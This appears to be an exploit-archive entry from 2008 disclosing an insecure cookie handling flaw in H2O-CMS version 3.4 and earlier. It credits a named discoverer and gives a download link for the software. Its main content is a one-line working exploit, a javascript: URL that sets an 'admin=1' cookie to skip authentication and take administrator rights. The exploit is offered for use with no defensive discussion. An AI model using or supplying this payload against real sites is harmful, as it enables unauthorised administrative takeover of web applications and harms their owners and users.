[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability
# Published : 2008-10-29
# Author : Stack
# Previous Title : Absolute Poll Manager XE 4.1 Cookie Handling Vulnerability
# Next Title : Sepal SPBOARD 4.5 (board.cgi) Remote Command Exec Vulnerability


# ----------------------------------------------------------
# H2O-CMS <= 3.4 Insecure Cookie Handling Vulnerability
# Discovered By Mountassif Moad
# Download On http://sourceforge.net/projects/h2o-cms
# Home World http://v4-team.com
# ----------------------------------------------------------
Exploit:
javascript:document.cookie = "admin=1; path=/";

# www.Syue.com [2008-10-29]